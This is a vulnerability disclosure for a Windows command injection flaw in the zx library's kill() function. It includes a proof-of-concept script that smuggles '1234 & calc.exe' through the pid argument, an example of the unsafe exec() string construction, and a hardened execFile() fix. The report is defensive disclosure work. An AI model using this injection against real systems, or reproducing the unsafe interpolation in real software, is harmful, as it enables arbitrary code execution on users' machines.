Description
A command injection vulnerability exists in the kill() function of the zx library when running on Windows. The function directly interpolates the pid argument into a shell command executed via child_process.exec(), without proper validation. An attacker controlling the pid input can execute arbitrary commands, resulting in remote code execution (RCE) on the affected system.
Vulnerable Code:
https://github.com/google/zx/blob/main/src/core.ts#L1040-L1046
Proof of Concept (PoC):
- Create poc2.mjs with the following content:

```js
#!/usr/bin/env zx
import { kill } from 'zx';

console.log('Running PoC for command injection vulnerability in kill()...');

// This vulnerability only works on Windows
if (process.platform !== 'win32') {
  console.log('This PoC is specifically designed for Windows. Aborted.');
  process.exit(0);
}

// Malicious payload: a PID followed by a shell separator and a second command (open calculator)
const maliciousPid = '1234 & calc.exe';
console.log(`Payload to be injected: ${maliciousPid}`);
console.log('Calling kill() function with the payload...');

try {
  await kill(maliciousPid);
} catch (error) {
  // taskkill may reject the bogus PID, but cmd.exe has already parsed and run the injected command
  console.log('Caught error from taskkill (this is expected).');
}

console.log('If PoC is successful, Windows Calculator should open now.');
```

- Save the PoC as poc2.mjs.
- Run it on Windows: zx poc2.mjs
- Observe that the Windows Calculator (calc.exe) opens, proving arbitrary command execution.
Impact
If an attacker can control the pid argument, they can execute any command on the Windows host, leading to full RCE.
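The following is an added example, not code from zx or from the reporter. It places the unsafe string construction the issue describes next to a hardened version that accepts only a positive integer PID and hands it to child_process.execFile() as a separate argv element, so no shell ever parses it. The function names (buildTaskkillCommandUnsafe, toSafePid, buildTaskkillArgs, killWindowsProcess, demo) are hypothetical, and the hardened form is one reasonable fix, not necessarily the one the project shipped.

```javascript
// Added example, not zx's own code. Function names are hypothetical.

// Unsafe pattern: the pid is spliced into one shell string. When that string is
// handed to child_process.exec(), cmd.exe parses it, so '&' inside the pid
// starts a second command ('1234 & calc.exe' becomes two commands).
function buildTaskkillCommandUnsafe(pid) {
  return `taskkill /pid ${pid} /t /f`;
}

// Hardened input check: accept only a positive integer PID. Numbers must be
// safe integers; strings must be pure decimal digits with no leading zero,
// whitespace or metacharacters. Everything else throws a TypeError.
function toSafePid(pid) {
  if (typeof pid === 'number') {
    if (Number.isSafeInteger(pid) && pid > 0) return pid;
    throw new TypeError(`invalid pid: ${pid}`);
  }
  if (typeof pid === 'string' && /^[1-9][0-9]*$/.test(pid)) {
    const n = Number(pid);
    if (Number.isSafeInteger(n)) return n;
  }
  throw new TypeError(`invalid pid: ${String(pid)}`);
}

// argv for execFile(): each element reaches taskkill as its own argument and
// no shell is involved, so metacharacters could not be interpreted as commands
// even if the validation above were somehow bypassed.
function buildTaskkillArgs(pid) {
  return ['/pid', String(toSafePid(pid)), '/t', '/f'];
}

// Windows-only: run taskkill without a shell. The dynamic import keeps this
// file loadable as either CommonJS or ESM.
async function killWindowsProcess(pid) {
  const args = buildTaskkillArgs(pid); // validates before anything is spawned
  const { execFile } = await import('node:child_process');
  return new Promise((resolve, reject) => {
    execFile('taskkill', args, { windowsHide: true }, (err, stdout) => {
      if (err) reject(err);
      else resolve(stdout);
    });
  });
}

// Show how the issue's payload fares under both constructions (constructed input).
function demo(payload = '1234 & calc.exe') {
  let hardened;
  try {
    hardened = `accepted: ${buildTaskkillArgs(payload).join(' ')}`;
  } catch (e) {
    hardened = `rejected: ${e.message}`;
  }
  return { unsafe: buildTaskkillCommandUnsafe(payload), hardened };
}
```

Two details matter in practice: child_process.exec() always goes through cmd.exe on Windows, so any interpolated value is shell input, whereas execFile() with an argv array invokes the binary directly; and passing `{ shell: true }` to execFile() or spawn() would reintroduce the same problem, so the PID validation is kept as defence in depth rather than relied on alone.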
Attached video: 2025-09-18.16-15-16.mp4
antongolub